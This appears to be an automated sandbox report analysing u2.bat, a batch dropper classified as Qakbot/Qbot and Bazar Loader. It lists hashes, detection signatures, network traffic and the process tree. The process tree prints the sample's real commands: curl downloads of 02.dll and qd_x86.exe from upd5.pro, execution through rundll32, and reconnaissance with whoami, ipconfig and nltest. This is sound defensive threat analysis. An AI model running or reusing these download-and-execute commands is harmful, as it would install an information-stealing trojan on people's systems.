Windows Analysis Report
u2.bat

Overview

General Information

Sample name: u2.bat
Analysis ID: 1427740
MD5: acaf01f83da439915027c3e2e900c8dd
SHA1: 2861b4e463fa89e05f2d7d629fae5140cef49843
SHA256: 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
Tags: bat, Qakbot, tchk08

Detection

Bazar Loader, Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Check for Windows Defender sandbox
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Bazar Loader
Yara detected Qbot
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Suspicious Child Process Of Wermgr.EXE
Uses ipconfig to lookup or modify the Windows network settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses whoami command line tool to query computer and username
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Qbot (aliases: QakBot, qbot)
Description: QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and as a loader that uses C2 servers for payload targeting and download.
Attribution: GOLD CABIN
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

AV Detection

Source: https://upd5.pro/update/02.dll Virustotal: Detection: 7%
Source: https://upd5.pro/update/qd_x86.exe Virustotal: Detection: 6%
Source: C:\Users\user\Desktop\qd_x86.exe ReversingLabs: Detection: 35%
Source: C:\Users\user\Desktop\qd_x86.exe Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\qd_x86.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800750F0 CryptAcquireContextA,GetLastError,CryptGenRandom, 3_2_00000001800750F0
Source: unknown HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 138.1.33.162:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: Binary string: conhost.pdbUGP source: 02.dll.2.dr
Source: Binary string: Z:\j\projects\qbot4\Release\Win32\qd_x86.pdb source: qd_x86.exe, 00000008.00000000.1799435968.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe, 00000008.00000002.1800368210.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe.5.dr
Source: Binary string: C:\testing3\data\bdnc\BDNIMBUS-3071711\BDNIMBUS\bin\release\bdnc.pdb source: rundll32.exe, 00000003.00000002.1739313508.0000000180252000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: conhost.pdb source: 02.dll.2.dr
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D98074 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_00D98074

Networking

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: global traffic TCP traffic: 192.168.2.4:49742 -> 62.204.41.234:2222
Source: Joe Sandbox View IP Address: 138.1.33.162 138.1.33.162
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected:
GET / HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: oracle.com
Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: global traffic HTTP traffic detected:
GET /update/02.dll HTTP/1.1
Host: upd5.pro
User-Agent: curl/7.83.1
Accept: */*
Source: global traffic HTTP traffic detected:
GET /update/qd_x86.exe HTTP/1.1
Host: upd5.pro
User-Agent: curl/7.83.1
Accept: */*
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: <li class="scl-facebook"><a data-lbl="scl-icon:facebook" href="https://www.facebook.com/Oracle/" equals www.facebook.com (Facebook)
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: <li class="scl-linkedin"><a data-lbl="scl-icon:linkedin" href="https://www.linkedin.com/company/oracle/" equals www.linkedin.com (Linkedin)
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: <li class="scl-youtube"><a data-lbl="scl-icon:you-tube" href="https://www.youtube.com/oracle/" equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: upd5.pro
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://academy.oracle.com/en/oa-web-overview.html
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://c.go-mpulse.net
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://consent.trustarc.com
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://d.oracleinfinity.io
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://dc.oracleinfinity.io
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://developer.oracle.com/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://developer.oracle.com/python/what-is-python/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://go.oracle.com/subscriptions
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://investor.oracle.com/home/default.aspx
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://oracle.112.2o7.net
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://profile.oracle.com/myprofile/account/create-account.jspx
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://s.go-mpulse.net
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://s.go-mpulse.net/boomerang/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://s2.go-mpulse.net/boomerang/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://search.oracle.com/events?q=&amp;lang=english
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://search.oracle.com/results
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://search.oracle.com/results?q=u30searchterm&size=10&page=1&tab=all
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://secure.ethicspoint.com/domain/media/en/gui/31053/index.html
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://support.apple.com/downloads/safari
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://tags.tiqcdn.com/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://tms.oracle.com/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://tms.oracle.com/main/dev/utag.js
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://tms.oracle.com/main/prod/utag.js
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://tms.oracle.com/main/prod/utag.sync.js
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://twitter.com/oracle
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1705403839.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1705969959.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1705469913.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, u2.bat String found in binary or memory: https://upd5.pro/update/02.dll
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/02.dll)
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/02.dllLE_S
Source: curl.exe, 00000002.00000002.1705793371.0000014861370000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/02.dllWinsta0
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/02.dllcej
Source: curl.exe, 00000002.00000002.1705793371.0000014861370000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/02.dllcurl
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/02.dllg5m
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/02.dllws
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1757932601.000001B929406000.00000004.00000020.00020000.00000000.sdmp, u2.bat String found in binary or memory: https://upd5.pro/update/qd_x86.exe
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/qd_x86.exe)
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/qd_x86.exeWinsta0
Source: curl.exe, 00000005.00000003.1757684017.000001B929403000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1757932601.000001B929406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/qd_x86.exeb
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/qd_x86.execurl
Source: curl.exe, 00000005.00000002.1758052563.000001B92943C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://upd5.pro/update/qd_x86.exee
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.google.com/chrome/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.linkedin.com/company/oracle/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.mozilla.org/en-US/firefox/new/
Source: wermgr.exe, 00000004.00000003.1797652770.0000022090DE3000.00000004.00000020.00020000.00000000.sdmp, upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-120.png
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-128.png
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-152.png
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-180.png
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-192.png
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-32.png
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/fonts/oraclesansvf.woff2
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/asset/web/fonts/redwoodicons.woff2
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/corporate/accessibility/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/upgrade-browser/
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.oracle.com/webapps/redirect/signon?nexturl=
Source: upgrade-browser[1].htm.4.dr String found in binary or memory: https://www.youtube.com/oracle/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002BAB0 NtAllocateVirtualMemory,NtProtectVirtualMemory, 3_2_000000018002BAB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001E0A0 3_2_000000018001E0A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004D020 3_2_000000018004D020
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800040B0 3_2_00000001800040B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002F0C0 3_2_000000018002F0C0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180030190 3_2_0000000180030190
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800D61A0 3_2_00000001800D61A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800201B0 3_2_00000001800201B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180009200 3_2_0000000180009200
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180083220 3_2_0000000180083220
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800164D0 3_2_00000001800164D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180004530 3_2_0000000180004530
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180250558 3_2_0000000180250558
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180244524 3_2_0000000180244524
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180032550 3_2_0000000180032550
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180236540 3_2_0000000180236540
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018022D588 3_2_000000018022D588
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180031570 3_2_0000000180031570
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800475D0 3_2_00000001800475D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800195D0 3_2_00000001800195D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018023065C 3_2_000000018023065C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002F640 3_2_000000018002F640
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800576A0 3_2_00000001800576A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180036710 3_2_0000000180036710
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018024C700 3_2_000000018024C700
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180006760 3_2_0000000180006760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180050770 3_2_0000000180050770
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800307D0 3_2_00000001800307D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002F800 3_2_000000018002F800
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000C840 3_2_000000018000C840
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002E920 3_2_000000018002E920
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018022D95C 3_2_000000018022D95C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180031950 3_2_0000000180031950
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180032970 3_2_0000000180032970
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018022E968 3_2_000000018022E968
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001802439F4 3_2_00000001802439F4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180032B40 3_2_0000000180032B40
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180020B50 3_2_0000000180020B50
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180031BB0 3_2_0000000180031BB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002FBB0 3_2_000000018002FBB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180048C20 3_2_0000000180048C20
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001CC70 3_2_000000018001CC70
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180031CB0 3_2_0000000180031CB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002FD10 3_2_000000018002FD10
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018022DD30 3_2_000000018022DD30
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180046DA0 3_2_0000000180046DA0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001DDC0 3_2_000000018001DDC0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004FDE0 3_2_000000018004FDE0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180030E40 3_2_0000000180030E40
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002FE50 3_2_000000018002FE50
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180243EA4 3_2_0000000180243EA4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898474A534 3_2_000001898474A534
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000189847460C0 3_2_00000189847460C0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898473C118 3_2_000001898473C118
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898474833C 3_2_000001898474833C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984744398 3_2_0000018984744398
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898473540C 3_2_000001898473540C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984751D50 3_2_0000018984751D50
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898474CDC0 3_2_000001898474CDC0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898473CE00 3_2_000001898473CE00
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984735EF4 3_2_0000018984735EF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898474F054 3_2_000001898474F054
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984750010 3_2_0000018984750010
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984753880 3_2_0000018984753880
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984744910 3_2_0000018984744910
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984739B44 3_2_0000018984739B44
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984745B9C 3_2_0000018984745B9C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984700040 3_2_0000018984700040
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898472055D 3_2_000001898472055D
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898471B5CD 3_2_000001898471B5CD
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898470B60D 3_2_000001898470B60D
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984704701 3_2_0000018984704701
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898471D861 3_2_000001898471D861
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898471E81D 3_2_000001898471E81D
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898472208D 3_2_000001898472208D
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984718D41 3_2_0000018984718D41
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000189847148CD 3_2_00000189847148CD
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984716B49 3_2_0000018984716B49
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984712BA5 3_2_0000018984712BA5
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DB21A0 8_2_00DB21A0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D84243 8_2_00D84243
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DA23EF 8_2_00DA23EF
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DB44C0 8_2_00DB44C0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D845A2 8_2_00D845A2
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DB0800 8_2_00DB0800
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D84910 8_2_00D84910
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D6ABC1 8_2_00D6ABC1
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D84C6F 8_2_00D84C6F
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DBEC3F 8_2_00DBEC3F
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DAAD5D 8_2_00DAAD5D
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D84FCD 8_2_00D84FCD
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D69068 8_2_00D69068
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D652FF 8_2_00D652FF
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DAD200 8_2_00DAD200
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DA1370 8_2_00DA1370
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D8533A 8_2_00D8533A
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D85698 8_2_00D85698
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DA18A0 8_2_00DA18A0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D8386E 8_2_00D8386E
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DBF9AF 8_2_00DBF9AF
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D85A8C 8_2_00D85A8C
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D83BB0 8_2_00D83BB0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DA1CF0 8_2_00DA1CF0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DADC08 8_2_00DADC08
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D65EEE 8_2_00D65EEE
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D9FE89 8_2_00D9FE89
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D85E8F 8_2_00D85E8F
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D83F01 8_2_00D83F01
Source: C:\Users\user\Desktop\qd_x86.exe Code function: String function: 00D66E70 appears 62 times
Source: C:\Users\user\Desktop\qd_x86.exe Code function: String function: 00D92DA3 appears 56 times
Source: C:\Users\user\Desktop\qd_x86.exe Code function: String function: 00D61140 appears 54 times
Source: C:\Users\user\Desktop\qd_x86.exe Code function: String function: 00D91F12 appears 35 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180026F00 appears 52 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000001800D7120 appears 105 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018002B690 appears 297 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180043930 appears 40 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180227E80 appears 162 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00000001800C6790 appears 133 times
Source: 02.dll.2.dr Binary string: [25lonecore\windows\core\console\open\src\server\objectheader.cpponecore\windows\core\console\open\src\server\apimessage.cpponecore\windows\core\console\open\src\server\processhandle.cpponecore\windows\core\console\open\src\server\waitblock.cpponecore\windows\core\console\open\src\server\processpolicy.cpponecore\windows\core\console\open\src\server\iodispatchers.cpp\Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
Source: classification engine Classification label: mal100.troj.evad.winBAT@27/13@3/4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001CC70 CertOpenSystemStoreA,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,CertCloseStore, 3_2_000000018001CC70
Source: C:\Windows\System32\curl.exe File created: C:\Users\user\Desktop\02.dll
Source: C:\Windows\System32\wermgr.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{6B4E5A8F-03E1-4126-AAB7-090D37460596}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{9263F157-4717-4ABA-8EFD-70F4E97A0B5D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\wskctabigvrftilyolne
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\u2.bat" "
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\curl.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\u2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\ipconfig.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\whoami.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\nltest.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\qwinsta.exe qwinsta
